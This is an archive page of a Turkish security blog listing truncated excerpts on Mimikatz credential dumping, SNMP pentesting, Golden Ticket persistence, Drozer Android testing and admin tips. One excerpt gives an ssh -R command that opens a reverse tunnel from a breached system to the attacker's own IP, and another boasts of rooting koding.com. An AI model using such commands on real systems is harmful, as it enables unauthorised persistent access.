September 2015

2871997 Microsoft Güvenlik Bülteni ve Mimikatz

Mimikatz ve WCE (Windows Credentials Editor) gibi araçlar kullanılarak RAM üzerindeki kullanıcı adı ve parola bilgileri açık olarak elde edilebilmektedir. Konu ile ilgili ayrıntılı için, Bilgi Güvenliği Kapısı’ndaki “Bellekten Parolaların Elde Edilmesi” yazıları incelenebilir [1][2][3]. Microsoft, bellek üzerinden parolaların açık halinin elde edilmesini önlemek için 13 Mayıs 2014 tarihinde 2871997 numaralı en önemli ilk güncelleme […]

2871997 Microsoft Güvenlik Bülteni ve Mimikatz Read More »

SNMP Güvenliği ve Router Pentest

SNMPv1 ve SNMPv2 yönetim sırasında kimlik doğrulamayı sağlamak içn topluluk ismi (community name) adı verilen bir kimlik doğrulayıcı/şifre kullanır, kullanıcı adı kullanılmaz. SNMPv3 ise şifreleme ve mesaj bütünlüğü sağlayarak kimlik doğrulamayı daha güvenilir hale getirmiştir. SNMPv3 ile kimlik doğrulama sırasında kullanıcı adı ve şifre birlikte kullanılarak daha güvenilir bir yapı sunar. Ancak SNMPv3 kullanımı henüz

SNMP Güvenliği ve Router Pentest Read More »

QPython için Fetch Serverlar

FETCH SERVERLERİN ÇALIŞMASI İÇİN YUKARIDAKİ REKLAMA TIKLAMANIZ GEREKMEKTEDİR. Merhaba arkadaşlar, yorum olarak ve özelden fetch server istediğinizi duydum. Sizlere fetch server sürüsünü paylaşmak istiyorum. Aralarından patlaklar çıkabilir ama girdiğinizde çince bişeyler yazıyorsa çalışıyor demektir. Şimdiden iyi eğlenceler. http://topsy1723.appspot.com/fetch.py http://suppers-canner7.appspot.com/fetch.py http://kammpretktf.appspot.com/fetch.py http://suppers-canner4.appspot.com/fetch.py

QPython için Fetch Serverlar Read More »

SSH ile Tersine Tünel Açmak

Merhaba arkadaşlar, Girdiğiniz bir sistem üzerinde, dış IP erişimine izin verilmiyor ise, yapacağınız, tek şey içeriden dışarıya erişime açmak.Onuda yapacağımız şey, linux kullanıyor iseniz, size bağlantı sağlamaktır. Onu da şu biçim yapıyoruz, ssh -R 1453:localhost:22 sizin_kullanici_adiniz@sizin_ip_adresiniz şeklinde sizin ip adresine root olarak giriş yapıyoruz. veya herhangi bi şekildede olabilir. root olmak zorunda değildir. Örneğin ben

SSH ile Tersine Tünel Açmak Read More »

Koding.com Rootlanmıştır.

Merhaba arkadaşlar, bildiğiniz üzere koding.com sizlere küçük bir hesap veriyor. Verdiği hesapta ise, sadece /home/kullaniciadiniz olarak perl ve python kullanabiliyorsunuz. Ancak kendilerini yüksek güvenlikli olduklarını savunuyorlar. Savunuyorlar ki, bunlara güvenliğini gösterme zamanının geldiğini düşünürken, rootlamış bulunduk. [php]Linux furkansandal 3.13.0-29-generic #53-Ubuntu SMP Wed Jun 4 21:00:20 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux[/php] kernelini kullanıyor. Özellikle gidipte, 3.13x serisini kullanmışlar 🙂 Oysa 1 milyon satırlık kernelleri olsada, bu rootlanamayacağı anlamına gelmiyor

Koding.com Rootlanmıştır. Read More »

Ömür Boyu Bedeva Linux VPS

Merhaba arkadaşlar, kendimde arkadaşlarımda burayı kullanıyoruz. Ben yaklaşık 6 aydır arkadaşlarım ise, 1-2 hafta biride 2 gün önce aldı. Genel detaylara girersek, Makine Özellikleri 512mb Ram – 10gb HDD – 100gb Bandwidth(Aylık) – 1 CPU – Linux OS Sistemin İşleyişi Nasıl ? Sistemin işleyişi basit aslında siteye giriyorsunuz ana sayfada büyükçe bir mail adresi girme

Ömür Boyu Bedeva Linux VPS Read More »

[Post Exploitation]#3 Golden Ticket ile Etki Alanına Sürekli ve Yetkili Erişim

Kurum içine yapılan saldırılarda veya sızma testlerinde Domain Admin yetkisini elde eden bir saldırgan etki alanındaki (neredeyse) her bilgisayarı ele geçirmiş olur denebilir. Eğer güven (trust) ilişkisi varsa bu durumda diğer etki alanları da tehlike altına girebilir. Bunun haricinde yönetim kolaylığı olması açısından saldırıya uğrayan etki alanına dahil edilmiş kritik sistemler de tehlikeye maruz kalabilir.

[Post Exploitation]#3 Golden Ticket ile Etki Alanına Sürekli ve Yetkili Erişim Read More »

TMG Download Limit Problemi

Proxy sunucu olarak TMG kullanıyorsanız ve aşağıdaki gibi bir hata aldıysanız download limiti ile ilgili düzenleme yapmalısınız. TMG’ de kurulum ile birlikte gelen download limiti 1024 MB’ tır. Bunu aşağıdaki adımları izleyerek degiştirebilirsiniz; – Web Access Policy seçilir – Ekranın sağ tarafında Task kısmında Configure Malware Inspection kısmı seçilir, – Inspection Settings tabında aşağıda işaretlediğim

TMG Download Limit Problemi Read More »

[Android] Güvensiz Komponentlerin Drozer ile Tespiti

Daha önceki Android’de İzin Almadan İzin Kullanmak yazısında bahsedildiği üzere korunmayan komponentler diğer uygulamalar tarafından kötü niyetli olarak kullanılabilmektedir. Content Provider’ların sunmuş olduğu veriler okunabilir, servislere ve activity’lere izin almadan kontrolsüz bir şekilde erişilebilir ve bazı işlemler yaptırılabilir. Bu bağlamda güvenlik testi yaparken uygulanacak adımlardan bir tanesi güvensiz komponentlerin tespit edilmesi olacaktır. Korunmayan, güvensiz komponentlerin

[Android] Güvensiz Komponentlerin Drozer ile Tespiti Read More »

Komut Satırından Text File’ a Çıktı Almak

Bazen komut satırında çalıştırdığınız komutların çıktı olarak bir text file’ a çıkmasını istersiniz. Böyle bir şeyi genellikle GPO ile uyguladığınız bir takım ayarların sonuçlarını almak için kullanmak isteyebilirsiniz. Örneğin basit bir işlem olarak kullanıcıların bilgisayarlarında bir kopyalaam yaptınız ve hangi bilgisayarlarda bunun uygulandığını görmek istiyorsunuz. Çalıştırdığınız komutun sonuna >C:xxx.txt şeklinde komut eklerseniz bu komut ilgili

Komut Satırından Text File’ a Çıktı Almak Read More »